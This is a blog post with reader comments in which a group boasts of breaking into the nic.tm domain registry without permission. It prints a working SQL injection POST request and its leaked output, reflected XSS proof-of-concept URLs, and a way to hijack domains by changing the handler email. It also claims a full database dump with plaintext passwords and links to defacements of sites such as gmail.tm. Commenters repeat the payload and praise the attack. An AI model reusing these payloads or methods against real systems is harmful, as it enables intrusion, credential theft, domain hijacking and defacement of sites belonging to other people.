In an independent project we decided to penetrate some important sites and today we wanna share a small part of what we have done. Today we proudly announce about nic.tm here, it has a vulnerable application which is prone to a MySQL injection bug. It was a big lead for us to have all sites credentials. The rest of this update, we shall indicate about the vulnerability affected the site.
If you glance at picture below:
It can be understood that the hidden parameters might not be checked, it was a hole we’ve focused on it:
POST /cgi-bin/mail_my_domains HTTP/1.1 Host: nic.tm Content-Type: application/x-www-form-urlencoded Content-Length: 142 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Connection: Close Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27 %2C0x7e%29--+a&OrderBy=1
And we received:
.................. .................. ..................The database search found 0 ~'drs@localhost'~ domains
Oops, we saw the data leakage from Nic.tm’s database, drs@localhost is current user of database. In the term of data gathering, we made the attack automatically and dumped all the database. Another considerable note was the passwords, they have been saved in clear text and this is an unacceptable issue for a NIC of a country. All dumped data are accessible by this link. We also found some important domains among the dumped data (They have been listed below), we were capable of hijacking them easily:
www.youtube.tm www.gmail.tm www.msdn.tm www.intel.tm www.officexp.tm www.xbox.tm www.windowsvista.tm www.orkut.tm www.google.tm (?) www.yahoo.tm www.cisco.tm
This was not end of story, we realized that the application suffers from reflected Cross site scripting too. The infected parameters were Addr and OrderBy, POCs:
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E /cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
They both correctly work on Firefox. At last I would show you panel of Gmail.tm after authentication:
We can also indicate to another security imperfection, in the panel, if you want to change the DNS of a domain, A confirmation e-mail is also sent to handler’s email which can be changed to attacker’s mail address. The following domains were defaced for POC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
Have a nice hacking, be safe.
lol , i am sorry for nic.tm
tnx for sharing .
دمت جیز
https://www.nic.tm//cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1–+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
there is nothing
i hope to explain to me how or where access remember Me
It’s been fixed Sola : )
Awesome and simple hack! Thanks for sharing!!
thanks for comment
یاشار دمت گرم
یه سوال داشتم
یه نفر هست همش داره سایت های جوملایی رو هک میکنه به اسم
gh()st
سایتشم اینه داداش:sec-w.com
این ایمیلمه میشه بگی چیکار کنم از دست این عرب پدر…؟
alavinik.nao@gmail.com
ایشون به احتمال بسیار زیاد روی یکی از کامپوننت های جوملا باگ داره
شما اگر هک شدی لیست افزونه هات رو برای من بنویس
Simple Hack
Nice
Thanks : D
Gr8 Job
Nice Job